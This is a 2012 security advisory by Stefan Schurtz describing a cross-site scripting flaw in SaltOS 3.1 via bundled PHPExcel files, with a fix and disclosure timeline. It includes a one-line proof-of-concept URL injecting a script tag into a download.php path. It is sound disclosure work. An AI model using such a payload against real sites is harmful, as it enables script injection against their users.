[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

SaltOS 3.1 Cross-Site Scripting vulnerability



Advisory: SaltOS 3.1 Cross-Site Scripting vulnerability
Advisory ID: SSCHADV2012-018
Author: Stefan Schurtz
Affected Software: Successfully tested on SaltOS 3.1 r4908 
Vendor URL: http://www.saltos.net
Vendor Status: fixed

==========================
Vulnerability Description
==========================

SaltOS 3.1 is prone to a Cross-Site Scripting vulnerability, because of using PHPExcel 1.7.7 (latest version)

==================
PoC-Exploit
==================

http://[target]/SaltOS-3.1/user/lib/phpexcel/PHPExcel/Shared/JAMA/docs/download.php/ '><script>alert('xss')</script>

=========
Solution
=========

Unused directories (docs, examples and tests directories from the PHPExcel/Shared/JAMA directory) are removed.
 
Update to the latest version (Fixed in the nightly build r5696 from 2012-08-14).

====================
Disclosure Timeline
====================

13-Aug-2012 - developer informed
13-Aug-2012 - feedback from developer
14-Aug-2012 - fixed by developer

========
Credits
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/2012/SSCHADV2012-018.txt